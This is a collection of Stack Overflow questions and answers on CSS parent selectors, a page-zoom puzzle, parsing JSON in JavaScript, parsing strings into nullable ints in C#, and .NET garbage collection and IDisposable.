Edit: Given how "drafty" a draft spec can be, it's best to keep tabs on this by checking the CSSWG's page on selectors level 4.
A: Future answer with CSS4 selectors
New CSS Specs contain an experimental :has pseudo selector that might be able to do this thing.
li:has(a:active) {
/* ... */
}
The browser support on this is basically non-existent at this time, but it is in consideration on the official specs.
Answer in 2012 that was wrong in 2012 and is even more wrong in 2018
While it is true that CSS cannot ASCEND, it is incorrect that you cannot grab the parent element of another element. Let me reiterate:
Using your HTML example code, you are able to grab the li without specifying li
ul * a {
property:value;
}
In this example, the ul is the parent of some element and that element is the parent of anchor. The downside of using this method is that if there is a ul with any child element that contains an anchor, it inherits the styles specified.
You may also use the child selector as well since you'll have to specify the parent element anyway.
ul>li a {
property:value;
}
In this example, the anchor must be a descendant of an li that MUST be a child of ul, meaning it must be within the tree following the ul declaration. This is going to be a bit more specific and will only grab a list item that contains an anchor AND is a child of ul.
SO, to answer your question by code.
ul.menu > li a.active {
property:value;
}
This should grab the ul with the class of menu, and the child list item that contains only an anchor with the class of active.
A: Another thought occurred to me just now that could be a pure CSS solution. Display your active class as an absolutely positioned block and set its style to cover up the parent li.
a.active {
position:absolute;
display:block;
width:100%;
height:100%;
top:0em;
left:0em;
background-color: whatever;
border: whatever;
}
/* will also need to make sure the parent li is a positioned element so... */
ul.menu li {
position:relative;
}
For those of you who want to use javascript without jquery...
Selecting the parent is trivial. You need a getElementsByClass function of some sort, unless you can get your drupal plugin to assign the active item an ID instead of Class. The function I provided I grabbed from some other genius on SO. It works well, just keep in mind when you're debugging that the function will always return an array of nodes, not just a single node.
active_li = getElementsByClass("active","a");
active_li[0].parentNode.style.whatever="whatever";
function getElementsByClass(node,searchClass,tag) {
var classElements = new Array();
var els = node.getElementsByTagName(tag); // use "*" for all elements
var elsLen = els.length;
var pattern = new RegExp("\\b"+searchClass+"\\b");
for (i = 0, j = 0; i < elsLen; i++) {
if ( pattern.test(els[i].className) ) {
classElements[j] = els[i];
j++;
}
}
return classElements;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45004",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "367"
} |
Q: Can the HTTP version or headers affect the visual appearance of a web page? I know, I would have thought the answer was obviously "no" as well, but I am experiencing a strange situation where when I view my site from our staging server it appears slightly larger than when I view it from my local dev server. I have used Charles to confirm that all of the content -- the HTML, the images, the CSS, the javascript, everything is the same.
The ONLY difference in the traffic is that (because the local site is served from the Django development mode server) the response headers look like this:
HTTP/1.0 200 OK
Server WSGIServer/0.1 Python/2.5.2
Date Thu, 04 Sep 2008 23:56:10 GMT
Vary Cookie
Content-Length 2301
Content-Type text/html; charset=utf-8
Whereas on the staging server (where Django is running inside Apache) the headers look like this:
HTTP/1.1 200 OK
Date Thu, 04 Sep 2008 23:56:06 GMT
Server Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5 with Suhosin-Patch
Vary Cookie
Content-Length 2301
Content-Type text/html; charset=utf-8
So, as far as I can tell the only differences are HTTP/1.1 vs HTTP/1.0, the server identifer (Apache vs WSGIServer) and the order of the Date/Server headers.
To elaborate a bit further on the differences in appearance, basically it appears as if the version of the site on the staging server is "zoomed in" by about 10%. For example, the primary logo which dominates our home page is 220 pixels wide but when server from our staging server shows up as 245 pixels wide. Everything else on the page, (other images, text, spacing, etc) is also proportionately larger.
This is all in Firefox 3. I don't have any other browsers available to test with at the moment.
Has anyone else encountered any bizarre behavior anything like this before? I am at a loss.
A: Have you tried View -> Zoom -> Reset on both sites?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45013",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Safely turning a JSON string into an object Given a string of JSON data, how can I safely turn that string into a JavaScript object?
Obviously I can do this unsafely with something like:
var obj = eval("(" + json + ')');
but that leaves me vulnerable to the JSON string containing other code, which it seems very dangerous to simply eval.
A: The jQuery method is now deprecated. Use this method instead:
let jsonObject = JSON.parse(jsonString);
Original answer using deprecated jQuery functionality:
If you're using jQuery just use:
jQuery.parseJSON( jsonString );
It's exactly what you're looking for (see the jQuery documentation).
A: Use the simple code example in "JSON.parse()":
var jsontext = '{"firstname":"Jesper","surname":"Aaberg","phone":["555-0100","555-0120"]}';
var contact = JSON.parse(jsontext);
and reversing it:
var str = JSON.stringify(arr);
A: I found a "better" way:
In CoffeeScript:
try data = JSON.parse(jqxhr.responseText)
data ||= { message: 'Server error, please retry' }
In Javascript:
var data;
try {
data = JSON.parse(jqxhr.responseText);
} catch (_error) {}
data || (data = {
message: 'Server error, please retry'
});
A: JSON parsing is always a pain. If the input is not as expected it throws an error and crashes what you are doing.
You can use the following tiny function to safely parse your input. It always turns an object even if the input is not valid or is already an object which is better for most cases:
JSON.safeParse = function (input, def) {
// Convert null to empty object
if (!input) {
return def || {};
} else if (Object.prototype.toString.call(input) === '[object Object]') {
return input;
}
try {
return JSON.parse(input);
} catch (e) {
return def || {};
}
};
A: Parse the JSON string with JSON.parse(), and the data becomes a JavaScript object:
JSON.parse(jsonString)
Here, JSON represents to process JSON dataset.
Imagine we received this text from a web server:
'{ "name":"John", "age":30, "city":"New York"}'
To parse into a JSON object:
var obj = JSON.parse('{ "name":"John", "age":30, "city":"New York"}');
Here obj is the respective JSON object which looks like:
{ "name":"John", "age":30, "city":"New York"}
To fetch a value use the . operator:
obj.name // John
obj.age //30
Convert a JavaScript object into a string with JSON.stringify().
A: JSON.parse() converts any JSON string passed into the function into a JSON object.
To understand it better, press F12 to open "Inspect Element" in your browser and go to the console to write the following commands:
var response = '{"result":true,"count":1}'; //sample json object(string form)
JSON.parse(response); //converts passed string to JSON Object.
Now run the command:
console.log(JSON.parse(response));
You'll get output as an Object {result: true, count: 1}.
In order to use that Object, you can assign it to the variable, maybe obj:
var obj = JSON.parse(response);
By using obj and the dot (.) operator you can access properties of the JSON object.
Try to run the command:
console.log(obj.result);
A: JSON.parse(jsonString);
json.parse will change into object.
A: Official documentation:
The JSON.parse() method parses a JSON string, constructing the JavaScript value or object described by the string. An optional reviver function can be provided to perform a transformation on the resulting object before it is returned.
Syntax:
JSON.parse(text[, reviver])
Parameters:
text
: The string to parse as JSON. See the JSON object for a description of JSON syntax.
reviver (optional)
: If a function, this prescribes how the value originally produced by parsing is transformed, before being returned.
Return value
The Object corresponding to the given JSON text.
Exceptions
Throws a SyntaxError exception if the string to parse is not valid JSON.
A: If we have a string like this:
"{\"status\":1,\"token\":\"65b4352b2dfc4957a09add0ce5714059\"}"
then we can simply use JSON.parse twice to convert this string to a JSON object:
var sampleString = "{\"status\":1,\"token\":\"65b4352b2dfc4957a09add0ce5714059\"}"
var jsonString= JSON.parse(sampleString)
var jsonObject= JSON.parse(jsonString)
And we can extract values from the JSON object using:
// instead of last JSON.parse:
var { status, token } = JSON.parse(jsonString);
The result will be:
status = 1 and token = 65b4352b2dfc4957a09add0ce5714059
A: Performance
There are already good answer for this question, but I was curious about performance and today 2020.09.21 I conduct tests on MacOs HighSierra 10.13.6 on Chrome v85, Safari v13.1.2 and Firefox v80 for chosen solutions.
Results
*
*eval/Function (A,B,C) approach is fast on Chrome (but for big-deep object N=1000 they crash: "maximum stack call exceed)
*eval (A) is fast/medium fast on all browsers
*JSON.parse (D,E) are fastest on Safari and Firefox
Details
I perform 4 tests cases:
*
*for small shallow object HERE
*for small deep object HERE
*for big shallow object HERE
*for big deep object HERE
Object used in above tests came from HERE
let obj_ShallowSmall = {
field0: false,
field1: true,
field2: 1,
field3: 0,
field4: null,
field5: [],
field6: {},
field7: "text7",
field8: "text8",
}
let obj_DeepSmall = {
level0: {
level1: {
level2: {
level3: {
level4: {
level5: {
level6: {
level7: {
level8: {
level9: [[[[[[[[[['abc']]]]]]]]]],
}}}}}}}}},
};
let obj_ShallowBig = Array(1000).fill(0).reduce((a,c,i) => (a['field'+i]=getField(i),a) ,{});
let obj_DeepBig = genDeepObject(1000);
// ------------------
// Show objects
// ------------------
console.log('obj_ShallowSmall:',JSON.stringify(obj_ShallowSmall));
console.log('obj_DeepSmall:',JSON.stringify(obj_DeepSmall));
console.log('obj_ShallowBig:',JSON.stringify(obj_ShallowBig));
console.log('obj_DeepBig:',JSON.stringify(obj_DeepBig));
// ------------------
// HELPERS
// ------------------
function getField(k) {
let i=k%10;
if(i==0) return false;
if(i==1) return true;
if(i==2) return k;
if(i==3) return 0;
if(i==4) return null;
if(i==5) return [];
if(i==6) return {};
if(i>=7) return "text"+k;
}
function genDeepObject(N) {
// generate: {level0:{level1:{...levelN: {end:[[[...N-times...['abc']...]]] }}}...}}}
let obj={};
let o=obj;
let arr = [];
let a=arr;
for(let i=0; i<N; i++) {
o['level'+i]={};
o=o['level'+i];
let aa=[];
a.push(aa);
a=aa;
}
a[0]='abc';
o['end']=arr;
return obj;
}
Below snippet presents chosen solutions
// src: https://stackoverflow.com/q/45015/860099
function A(json) {
return eval("(" + json + ')');
}
// https://stackoverflow.com/a/26377600/860099
function B(json) {
return (new Function('return ('+json+')'))()
}
// improved https://stackoverflow.com/a/26377600/860099
function C(json) {
return Function('return ('+json+')')()
}
// src: https://stackoverflow.com/a/5686237/860099
function D(json) {
return JSON.parse(json);
}
// src: https://stackoverflow.com/a/233630/860099
function E(json) {
return $.parseJSON(json)
}
// --------------------
// TEST
// --------------------
let json = '{"a":"abc","b":"123","d":[1,2,3],"e":{"a":1,"b":2,"c":3}}';
[A,B,C,D,E].map(f=> {
console.log(
f.name + ' ' + JSON.stringify(f(json))
)})
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
This shippet only presents functions used in performance tests - it not perform tests itself!
And here are example results for chrome
A: This seems to be the issue:
An input that is received via Ajax websocket etc, and it will be in String format, but you need to know if it is JSON.parsable. The touble is, if you always run it through JSON.parse, the program MAY continue "successfully" but you'll still see an error thrown in the console with the dreaded "Error: unexpected token 'x'".
var data;
try {
data = JSON.parse(jqxhr.responseText);
} catch (_error) {}
data || (data = {
message: 'Server error, please retry'
});
A: I'm not sure about other ways to do it but here's how you do it in Prototype (JSON tutorial).
new Ajax.Request('/some_url', {
method:'get',
requestHeaders: {Accept: 'application/json'},
onSuccess: function(transport){
var json = transport.responseText.evalJSON(true);
}
});
Calling evalJSON() with true as the argument sanitizes the incoming string.
A: JSON.parse(jsonString) is a pure JavaScript approach so long as you can guarantee a reasonably modern browser.
A: If you're using jQuery, you can also use:
$.getJSON(url, function(data) { });
Then you can do things like
data.key1.something
data.key1.something_else
etc.
A: Converting the object to JSON, and then parsing it, works for me, like:
JSON.parse(JSON.stringify(object))
A: The recommended approach to parse JSON in JavaScript is to use JSON.parse()
Background
The JSON API was introduced with ECMAScript 5 and has since been implemented in >99% of browsers by market share.
jQuery once had a $.parseJSON() function, but it was deprecated with jQuery 3.0. In any case, for a long time, it was nothing more than a wrapper around JSON.parse().
Example
const json = '{ "city": "Boston", "population": 500000 }';
const object = JSON.parse(json);
console.log(object.city, object.population);
Browser Compatibility
Is JSON.parse supported by all major browsers?
Pretty much, yes (see reference).
A: Just for fun, here is a way using a function:
jsonObject = (new Function('return ' + jsonFormatData))()
A: $.ajax({
url: url,
dataType: 'json',
data: data,
success: callback
});
The callback is passed the returned data, which will be a JavaScript object or array as defined by the JSON structure and parsed using the $.parseJSON() method.
A: This answer is for IE < 7, for modern browsers check Jonathan's answer above.
This answer is outdated and Jonathan's answer above (JSON.parse(jsonString)) is now the best answer.
JSON.org has JSON parsers for many languages including four different ones for JavaScript. I believe most people would consider json2.js their goto implementation.
A: Using JSON.parse is probably the best way.
Here's an example
var jsonRes = '{ "students" : [' +
'{ "firstName":"Michel" , "lastName":"John" ,"age":18},' +
'{ "firstName":"Richard" , "lastName":"Joe","age":20 },' +
'{ "firstName":"James" , "lastName":"Henry","age":15 } ]}';
var studentObject = JSON.parse(jsonRes);
A: Try using the method with this Data object. ex:Data='{result:true,count:1}'
try {
eval('var obj=' + Data);
console.log(obj.count);
}
catch(e) {
console.log(e.message);
}
This method really helps in Nodejs when you are working with serial port programming
A: The easiest way using parse() method:
var response = '{"result":true,"count":1}';
var JsonObject= JSON.parse(response);
Then you can get the values of the JSON elements, for example:
var myResponseResult = JsonObject.result;
var myResponseCount = JsonObject.count;
Using jQuery as described in the jQuery.parseJSON() documentation:
JSON.parse(jsonString);
A: You also can use reviver function to filter.
var data = JSON.parse(jsonString, function reviver(key, value) {
//your code here to filter
});
For more information read JSON.parse.
A: Older question, I know, however nobody notice this solution by using new Function(), an anonymous function that returns the data.
Just an example:
var oData = 'test1:"This is my object",test2:"This is my object"';
if( typeof oData !== 'object' )
try {
oData = (new Function('return {'+oData+'};'))();
}
catch(e) { oData=false; }
if( typeof oData !== 'object' )
{ alert( 'Error in code' ); }
else {
alert( oData.test1 );
alert( oData.test2 );
}
This is a little more safe because it executes inside a function and do not compile in your code directly. So if there is a function declaration inside it, it will not be bound to the default window object.
I use this to 'compile' configuration settings of DOM elements (for example the data attribute) simple and fast.
A: Summary:
Javascript (both browser and NodeJS) have a built in JSON object. On this Object are 2 convenient methods for dealing with JSON. They are the following:
*
*JSON.parse() Takes JSON as argument, returns JS object
*JSON.stringify() Takes JS object as argument returns JSON object
Other applications:
Besides for very conveniently dealing with JSON they have can be used for other means. The combination of both JSON methods allows us to make very easy make deep clones of arrays or objects. For example:
let arr1 = [1, 2, [3 ,4]];
let newArr = arr1.slice();
arr1[2][0] = 'changed';
console.log(newArr); // not a deep clone
let arr2 = [1, 2, [3 ,4]];
let newArrDeepclone = JSON.parse(JSON.stringify(arr2));
arr2[2][0] = 'changed';
console.log(newArrDeepclone); // A deep clone, values unchanged
A: Just to the cover parse for different input types
Parse the data with JSON.parse(), and the data becomes a JavaScript object.
var obj = JSON.parse('{ "name":"John", "age":30, "city":"New York"}');
When using the JSON.parse() on a JSON derived from an array, the method will return a JavaScript array, instead of a JavaScript object.
var myArr = JSON.parse(this.responseText);
console.log(myArr[0]);
Date objects are not allowed in JSON.
For Dates do somthing like this
var text = '{ "name":"John", "birth":"1986-12-14", "city":"New York"}';
var obj = JSON.parse(text);
obj.birth = new Date(obj.birth);
Functions are not allowed in JSON.
If you need to include a function, write it as a string.
var text = '{ "name":"John", "age":"function () {return 30;}", "city":"New York"}';
var obj = JSON.parse(text);
obj.age = eval("(" + obj.age + ")");
A: Another option
const json = '{ "fruit": "pineapple", "fingers": 10 }'
let j0s,j1s,j2s,j3s
console.log(`{ "${j0s="fruit"}": "${j1s="pineapple"}", "${j2s="fingers"}": ${j3s="10"} }`)
A: Try this. This one is written in typescript.
export function safeJsonParse(str: string) {
try {
return JSON.parse(str);
} catch (e) {
return str;
}
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45015",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1475"
} |
Q: How to parse a string into a nullable int I'm wanting to parse a string into a nullable int in C#. ie. I want to get back either the int value of the string or null if it can't be parsed.
I was kind of hoping that this would work
int? val = stringVal as int?;
But that won't work, so the way I'm doing it now is I've written this extension method
public static int? ParseNullableInt(this string value)
{
if (value == null || value.Trim() == string.Empty)
{
return null;
}
else
{
try
{
return int.Parse(value);
}
catch
{
return null;
}
}
}
Is there a better way of doing this?
EDIT: Thanks for the TryParse suggestions, I did know about that, but it worked out about the same. I'm more interested in knowing if there is a built-in framework method that will parse directly into a nullable int?
A: I feel my solution is a very clean and nice solution:
public static T? NullableParse<T>(string s) where T : struct
{
try
{
return (T)typeof(T).GetMethod("Parse", new[] {typeof(string)}).Invoke(null, new[] { s });
}
catch (Exception)
{
return null;
}
}
This is of course a generic solution which only require that the generics argument has a static method "Parse(string)". This works for numbers, boolean, DateTime, etc.
A: You can forget all other answers - there is a great generic solution:
http://cleansharp.de/wordpress/2011/05/generischer-typeconverter/
This allows you to write very clean code like this:
string value = null;
int? x = value.ConvertOrDefault();
and also:
object obj = 1;
string value = null;
int x = 5;
if (value.TryConvert(out x))
Console.WriteLine("TryConvert example: " + x);
bool boolean = "false".ConvertOrDefault();
bool? nullableBoolean = "".ConvertOrDefault();
int integer = obj.ConvertOrDefault();
int negativeInteger = "-12123".ConvertOrDefault();
int? nullableInteger = value.ConvertOrDefault();
MyEnum enumValue = "SecondValue".ConvertOrDefault();
MyObjectBase myObject = new MyObjectClassA();
MyObjectClassA myObjectClassA = myObject.ConvertOrDefault();
A: I would suggest following extension methods for string parsing into int value with ability to define default value in case parsing is not possible:
public static int ParseInt(this string value, int defaultIntValue = 0)
{
return int.TryParse(value, out var parsedInt) ? parsedInt : defaultIntValue;
}
public static int? ParseNullableInt(this string value)
{
if (string.IsNullOrEmpty(value))
return null;
return value.ParseInt();
}
A: int.TryParse is probably a tad easier:
public static int? ToNullableInt(this string s)
{
int i;
if (int.TryParse(s, out i)) return i;
return null;
}
Edit @Glenn int.TryParse is "built into the framework". It and int.Parse are the way to parse strings to ints.
A: [Updated to use modern C# as per @sblom's suggestion]
I had this problem and I ended up with this (after all, an if and 2 returns is soo long-winded!):
int? ToNullableInt (string val)
=> int.TryParse (val, out var i) ? (int?) i : null;
On a more serious note, try not to mix int, which is a C# keyword, with Int32, which is a .NET Framework BCL type - although it works, it just makes code look messy.
A: C# >= 7.1
var result = int.TryParse(foo, out var f) ? f : default;
See C# language versioning to ascertain what language version your project supports
A: The following should work for any struct type. It is based off code by Matt Manela from MSDN forums. As Murph points out the exception handling could be expensive compared to using the Types dedicated TryParse method.
public static bool TryParseStruct<T>(this string value, out Nullable<T> result)
where T: struct
{
if (string.IsNullOrEmpty(value))
{
result = new Nullable<T>();
return true;
}
result = default(T);
try
{
IConvertible convertibleString = (IConvertible)value;
result = new Nullable<T>((T)convertibleString.ToType(typeof(T), System.Globalization.CultureInfo.CurrentCulture));
}
catch(InvalidCastException)
{
return false;
}
catch (FormatException)
{
return false;
}
return true;
}
These were the basic test cases I used.
string parseOne = "1";
int? resultOne;
bool successOne = parseOne.TryParseStruct<int>(out resultOne);
Assert.IsTrue(successOne);
Assert.AreEqual(1, resultOne);
string parseEmpty = string.Empty;
int? resultEmpty;
bool successEmpty = parseEmpty.TryParseStruct<int>(out resultEmpty);
Assert.IsTrue(successEmpty);
Assert.IsFalse(resultEmpty.HasValue);
string parseNull = null;
int? resultNull;
bool successNull = parseNull.TryParseStruct<int>(out resultNull);
Assert.IsTrue(successNull);
Assert.IsFalse(resultNull.HasValue);
string parseInvalid = "FooBar";
int? resultInvalid;
bool successInvalid = parseInvalid.TryParseStruct<int>(out resultInvalid);
Assert.IsFalse(successInvalid);
A: You can do this in one line, using the conditional operator and the fact that you can cast null to a nullable type (two lines, if you don't have a pre-existing int you can reuse for the output of TryParse):
Pre C#7:
int tempVal;
int? val = Int32.TryParse(stringVal, out tempVal) ? tempVal : (int?)null;
With C#7's updated syntax that allows you to declare an output variable in the method call, this gets even simpler.
int? val = Int32.TryParse(stringVal, out var tempVal) ? tempVal : (int?)null;
A:
I'm more interested in knowing if there is a built-in framework method that will parse directly into a nullable int?
There isn't.
A: This solution is generic without reflection overhead.
public static Nullable<T> ParseNullable<T>(string s, Func<string, T> parser) where T : struct
{
if (string.IsNullOrEmpty(s) || string.IsNullOrEmpty(s.Trim())) return null;
else return parser(s);
}
static void Main(string[] args)
{
Nullable<int> i = ParseNullable("-1", int.Parse);
Nullable<float> dt = ParseNullable("3.14", float.Parse);
}
A:
Glenn Slaven: I'm more interested in knowing if
there is a built-in framework method
that will parse directly into a
nullable int?
There is this approach that will parse directly to a nullable int (and not just int) if the value is valid like null or empty string, but does throw an exception for invalid values so you will need to catch the exception and return the default value for those situations:
public static T Parse<T>(object value)
{
try { return (T)System.ComponentModel.TypeDescriptor.GetConverter(typeof(T)).ConvertFrom(value.ToString()); }
catch { return default(T); }
}
This approach can still be used for non-nullable parses as well as nullable:
enum Fruit { Orange, Apple }
var res1 = Parse<Fruit>("Apple");
var res2 = Parse<Fruit?>("Banana");
var res3 = Parse<int?>("100") ?? 5; //use this for non-zero default
var res4 = Parse<Unit>("45%");
NB: There is an IsValid method on the converter you can use instead of capturing the exception (thrown exceptions does result in unnecessary overhead if expected). Unfortunately it only works since .NET 4 but there's still an issue where it doesn't check your locale when validating correct DateTime formats, see bug 93559.
A: Old topic, but how about:
public static int? ParseToNullableInt(this string value)
{
return String.IsNullOrEmpty(value) ? null : (int.Parse(value) as int?);
}
I like this better as the requriement where to parse null, the TryParse version would not throw an error on e.g. ToNullableInt32(XXX). That may introduce unwanted silent errors.
A: Try this:
public static int? ParseNullableInt(this string value)
{
int intValue;
if (int.TryParse(value, out intValue))
return intValue;
return null;
}
A: I found and adapted some code for a Generic NullableParser class. The full code is on my blog Nullable TryParse
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Globalization;
namespace SomeNamespace
{
/// <summary>
/// A parser for nullable types. Will return null when parsing fails.
/// </summary>
/// <typeparam name="T"></typeparam>
///
public static class NullableParser<T> where T : struct
{
public delegate bool TryParseDelegate(string s, out T result);
/// <summary>
/// A generic Nullable Parser. Supports parsing of all types that implements the tryParse method;
/// </summary>
/// <param name="text">Text to be parsed</param>
/// <param name="result">Value is true for parse succeeded</param>
/// <returns>bool</returns>
public static bool TryParse(string s, out Nullable<T> result)
{
bool success = false;
try
{
if (string.IsNullOrEmpty(s))
{
result = null;
success = true;
}
else
{
IConvertible convertableString = s as IConvertible;
if (convertableString != null)
{
result = new Nullable<T>((T)convertableString.ToType(typeof(T),
CultureInfo.CurrentCulture));
success = true;
}
else
{
success = false;
result = null;
}
}
}
catch
{
success = false;
result = null;
}
return success;
}
}
}
A: I felt I should share mine which is a bit more generic.
Usage:
var result = "123".ParseBy(int.Parse);
var result2 = "123".ParseBy<int>(int.TryParse);
Solution:
public static class NullableParse
{
public static Nullable<T> ParseBy<T>(this string input, Func<string, T> parser)
where T : struct
{
try
{
return parser(input);
}
catch (Exception exc)
{
return null;
}
}
public delegate bool TryParseDelegate<T>(string input, out T result);
public static Nullable<T> ParseBy<T>(this string input, TryParseDelegate<T> parser)
where T : struct
{
T t;
if (parser(input, out t)) return t;
return null;
}
}
First version is a slower since it requires a try-catch but it looks cleaner. If it won't be called many times with invalid strings, it is not that important.
If performance is an issue, please note that when using TryParse methods, you need to specify the type parameter of ParseBy as it can not be inferred by the compiler. I also had to define a delegate as out keyword can not be used within Func<>, but at least this time compiler does not require an explicit instance.
Finally, you can use it with other structs as well, i.e. decimal, DateTime, Guid, etc.
A: public static void Main(string[] args)
{
var myString = "abc";
int? myInt = ParseOnlyInt(myString);
// null
myString = "1234";
myInt = ParseOnlyInt(myString);
// 1234
}
private static int? ParseOnlyInt(string s)
{
return int.TryParse(s, out var i) ? i : (int?)null;
}
A: The cleaner way would be to write a separate function or extension method, but if you just want a one-liner:
string s;
int? i = s == null ? (int?)null : int.Parse(s);
A: You should never use an exception if you don't have to - the overhead is horrible.
The variations on TryParse solve the problem - if you want to get creative (to make your code look more elegant) you could probably do something with an extension method in 3.5 but the code would be more or less the same.
A: Using delegates, the following code is able to provide reusability if you find yourself needing the nullable parsing for more than one structure type. I've shown both the .Parse() and .TryParse() versions here.
This is an example usage:
NullableParser.TryParseInt(ViewState["Id"] as string);
And here is the code that gets you there...
public class NullableParser
{
public delegate T ParseDelegate<T>(string input) where T : struct;
public delegate bool TryParseDelegate<T>(string input, out T outtie) where T : struct;
private static T? Parse<T>(string input, ParseDelegate<T> DelegateTheParse) where T : struct
{
if (string.IsNullOrEmpty(input)) return null;
return DelegateTheParse(input);
}
private static T? TryParse<T>(string input, TryParseDelegate<T> DelegateTheTryParse) where T : struct
{
T x;
if (DelegateTheTryParse(input, out x)) return x;
return null;
}
public static int? ParseInt(string input)
{
return Parse<int>(input, new ParseDelegate<int>(int.Parse));
}
public static int? TryParseInt(string input)
{
return TryParse<int>(input, new TryParseDelegate<int>(int.TryParse));
}
public static bool? TryParseBool(string input)
{
return TryParse<bool>(input, new TryParseDelegate<bool>(bool.TryParse));
}
public static DateTime? TryParseDateTime(string input)
{
return TryParse<DateTime>(input, new TryParseDelegate<DateTime>(DateTime.TryParse));
}
}
A: I realise this is an old topic, but can't you simply:
(Nullable<int>)int.Parse(stringVal);
?
A: I've come up with this one, which has satisfied my requirements (I wanted my extension method to emulate as close as possible the return of the framework's TryParse, but without try{} catch{} blocks and without the compiler complaining about inferring a nullable type within the framework method)
private static bool TryParseNullableInt(this string s, out int? result)
{
int i;
result = int.TryParse(s, out i) ? (int?)i : null;
return result != null;
}
A: I suggest code bellow. You may work with exception, when convert error occured.
public static class Utils {
public static bool TryParse<Tin, Tout>(this Tin obj, Func<Tin, Tout> onConvert, Action<Tout> onFill, Action<Exception> onError) {
Tout value = default(Tout);
bool ret = true;
try {
value = onConvert(obj);
}
catch (Exception exc) {
onError(exc);
ret = false;
}
if (ret)
onFill(value);
return ret;
}
public static bool TryParse(this string str, Action<int?> onFill, Action<Exception> onError) {
return Utils.TryParse(str
, s => string.IsNullOrEmpty(s) ? null : (int?)int.Parse(s)
, onFill
, onError);
}
public static bool TryParse(this string str, Action<int> onFill, Action<Exception> onError) {
return Utils.TryParse(str
, s => int.Parse(s)
, onFill
, onError);
}
}
Use this extension method in code (fill int? Age property of a person class):
string ageStr = AgeTextBox.Text;
Utils.TryParse(ageStr, i => person.Age = i, exc => { MessageBox.Show(exc.Message); });
OR
AgeTextBox.Text.TryParse(i => person.Age = i, exc => { MessageBox.Show(exc.Message); });
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45030",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "344"
} |
Q: Will the Garbage Collector call IDisposable.Dispose for me? The .NET IDisposable Pattern implies that if you write a finalizer, and implement IDisposable, that your finalizer needs to explicitly call Dispose.
This is logical, and is what I've always done in the rare situations where a finalizer is warranted.
However, what happens if I just do this:
class Foo : IDisposable
{
public void Dispose(){ CloseSomeHandle(); }
}
and don't implement a finalizer, or anything. Will the framework call the Dispose method for me?
Yes I realise this sounds dumb, and all logic implies that it won't, but I've always had 2 things at the back of my head which have made me unsure.
*
*Someone a few years ago once told me that it would in fact do this, and that person had a very solid track record of "knowing their stuff."
*The compiler/framework does other 'magic' things depending on what interfaces you implement (eg: foreach, extension methods, serialization based on attributes, etc), so it makes sense that this might be 'magic' too.
While I've read a lot of stuff about it, and there's been lots of things implied, I've never been able to find a definitive Yes or No answer to this question.
A: I want to emphasize Brian's point in his comment, because it is important.
Finalizers are not deterministic destructors like in C++. As others have pointed out, there is no guarantee of when it will be called, and indeed if you have enough memory, if it will ever be called.
But the bad thing about finalizers is that, as Brian said, it causes your object to survive a garbage collection. This can be bad. Why?
As you may or may not know, the GC is split into generations - Gen 0, 1 and 2, plus the Large Object Heap. Split is a loose term - you get one block of memory, but there are pointers of where the Gen 0 objects start and end.
The thought process is that you'll likely use lots of objects that will be short lived. So those should be easy and fast for the GC to get to - Gen 0 objects. So when there is memory pressure, the first thing it does is a Gen 0 collection.
Now, if that doesn't resolve enough pressure, then it goes back and does a Gen 1 sweep (redoing Gen 0), and then if still not enough, it does a Gen 2 sweep (redoing Gen 1 and Gen 0). So cleaning up long lived objects can take a while and be rather expensive (since your threads may be suspended during the operation).
This means that if you do something like this:
~MyClass() { }
Your object, no matter what, will live to Generation 2. This is because the GC has no way of calling the finalizer during garbage collection. So objects that have to be finalized are moved to a special queue to be cleaned out by a different thread (the finalizer thread - which if you kill makes all kinds of bad things happen). This means your objects hang around longer, and potentially force more garbage collections.
So, all of that is just to drive home the point that you want to use IDisposable to clean up resources whenever possible and seriously try to find ways around using the finalizer. It's in your application's best interests.
A: I don't think so. You have control over when Dispose is called, which means you could in theory write disposal code that makes assumptions about (for instance) the existence of other objects. You have no control over when the finalizer is called, so it would be iffy to have the finalizer automatically call Dispose on your behalf.
EDIT: I went away and tested, just to make sure:
class Program
{
static void Main(string[] args)
{
Fred f = new Fred();
f = null;
GC.Collect();
GC.WaitForPendingFinalizers();
Console.WriteLine("Fred's gone, and he's not coming back...");
Console.ReadLine();
}
}
class Fred : IDisposable
{
~Fred()
{
Console.WriteLine("Being finalized");
}
void IDisposable.Dispose()
{
Console.WriteLine("Being Disposed");
}
}
A: Not in the case you describe,
But the GC will call the Finalizer for you, if you have one.
HOWEVER. The next garbage collection ,instead of being collected, the object will go into the finalization que, everything gets collected, then it's finalizer called. The next collection after that it will be freed.
Depending on the memory pressure of your app, you may not have a gc for that object generation for a while. So in the case of say, a file stream or a db connection, you may have to wait a while for the unmanaged resource to be freed in the finalizer call for a while, causing some issues.
A: There's lots of good discussion already here, and I'm a little late to the party, but I wanted to add a few points myself.
*
*The Garbage collecter will never directly execute a Dispose method for you.
*The GC will execute finalizers when it feels like it.
*One common pattern that is used for objects that have a finalizer is to have it call a method which is by convention defined as Dispose(bool disposing) passing false to indicate that the call was made due to finalization rather than an explicit Dispose call.
*This is because it is not safe to make any assumptions about other managed objects while finalizing an object (they may have already been finalized).
class SomeObject : IDisposable {
IntPtr _SomeNativeHandle;
FileStream _SomeFileStream;
// Something useful here
~ SomeObject() {
Dispose(false);
}
public void Dispose() {
Dispose(true);
}
protected virtual void Dispose(bool disposing) {
if(disposing) {
GC.SuppressFinalize(this);
//Because the object was explicitly disposed, there will be no need to
//run the finalizer. Suppressing it reduces pressure on the GC
//The managed reference to an IDisposable is disposed only if the
_SomeFileStream.Dispose();
}
//Regardless, clean up the native handle ourselves. Because it is simple a member
// of the current instance, the GC can't have done anything to it,
// and this is the onlyplace to safely clean up
if(IntPtr.Zero != _SomeNativeHandle) {
NativeMethods.CloseHandle(_SomeNativeHandle);
_SomeNativeHandle = IntPtr.Zero;
}
}
}
That's the simple version, but there are a lot of nuances that can trip you up on this pattern.
*
